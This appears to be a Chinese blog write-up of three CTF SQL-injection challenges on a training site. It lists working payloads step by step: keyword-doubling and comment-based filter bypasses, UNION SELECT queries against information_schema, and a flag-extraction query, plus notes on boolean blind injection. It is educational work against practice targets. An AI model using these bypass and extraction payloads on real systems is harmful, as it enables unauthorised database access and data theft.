实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)
2017-08-12 12:03
477 查看
0x00
最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理,0x01 简单的sql注入
做题的地址为: http://ctf5.shiyanbar.com/423/web/第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤
我们来各种试试到底过滤了什么
第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过
滤了,好吧来试试如何绕过吧
第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1
第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1这
样尝试爆出表名来,居然报错,好吧 我来两个空格,估计是有个过滤函数,1' unionunion selectselect table_name fromfrom information_schema.tables wherewhere '1'='1这样可以得到表,
第五步:同样可以得到列名以及字段的数据最终payload如下:
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
总结:学到的知识:如何判断过滤了哪些字符;如果绕WAF
0X02简单的SQ
L注入2
做题地址:http://ctf5.shiyanbar.com/web/index_2.php本来我都写好了WP了发到实验吧了发现,不知道哪里可以看到自己的WP好吧,那我就来再写一遍吧。
这题就是做起来的时候不像第一题有显示哪里出错,直接给你的就是一个检测到你有SQL注入的提示。
第一步:首先也是老套路,id=1--->id=1'这样来判定,发现过滤了空格用payload测试列数:http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/order/**/by/**/1%23得到列数为一。
第二步:同样和第一题一样来测试表名,至少这里不需要重写关键字就可以payload如下
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
第三步:得到列名payload如下:
http://ctf5.shiyanbar.com/web/index_2.php?id=1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag
后门就是老套路了过程就不表了:
学习的至少点:本来按老套路应该有
union select database()的发现居然过了了“)”后来利用前面的至少点直接插数据库所有表吧,这样暴力绕过,后门再问大佬怎么绕过吧,如果有知道的大牛欢迎留言。
ox03简单的SQL注入3
做题地址:http://ctf5.shiyanbar.com/web/index_3.php第一步:上来先来老套路。。。http://ctf5.shiyanbar.com/web/index_3.php?id=1' http://ctf5.shiyanbar.com/web/index_3.php?id=1'%23发现可以闭合,心里总算安定了http://ctf5.shiyanbar.com/web/index_3.php?id=1'
order by 2%23发现还是一行。
第二步:开始使用union
查询试探。http://ctf5.shiyanbar.com/web/index_3.php?id=33333' union select database()%23居然啥反应也没有,顿时心中不知道该如何是好啊。
第三步:难道是各种过滤绕过,不会吧。。。前面不是已经一道绕过了?一翻fuzz后来试试这个吧:http://ctf5.shiyanbar.com/web/index_3.php?id=-1'
and 1=1%23发现有问题。。。。不会吧难道是bool盲注:不想写脚本,试试是不是绕过,多方试验之后发现就是bool盲注。没啥了来把写脚本吧。
第四步:脚本,先吃饭晚点发。。。
相关文章推荐
- 实验吧简单的sql注入解题思路
- 【HDU4313】Matrix 多校 解题报告+AC代码+思路+算法正确性证明,此为Kruskal贪心恶心版本,非自虐倾向慎入!建议想找解题报告的童鞋看简单版本的,这个我写给自己【目标达成 0.2%】
- [2016/03/09] 关于深搜的题目整理和思路 & 蓝桥杯历年试题 - 大臣的路费/颠倒的价牌
- 【数学建模】CUMCM-2009B 眼科病床的合理安排 解题思路整理
- C语言经典题目及解题思路
- 1001. A+B Format (20)的解题思路以及多源代码文件的尝试编写
- leetcode 第三题题目及解题思路
- leetcode -- Text Justification -- string操作的题目,思路简单,但是难以写对
- 【九度】抓取九度AC所有代码以及在CSDN的解题思路链接形成文件提交至github
- 【数学建模】CUMCM-2010A 储油罐的变位识别与罐容表标定 解题思路整理
- Alictf 2015决赛题目设计和解题思路
- C#简单远程控制制作源代码程序以及思路(客户端)
- c++第二次上机实验三道题目
- 部分acm题目的解题思路(转)
- openmp简单介绍以及使用实例(整理)
- 三道简单的前端HTML/CSS题目
- hpu暑假训练【拓扑解题思路以及模板】
- 【数学建模】CUMCM-2016A 系泊系统的设计 解题思路整理
- C#简单远程控制制作源代码程序以及思路(服务器端)
- ubuntu上安装mysql以及简单实验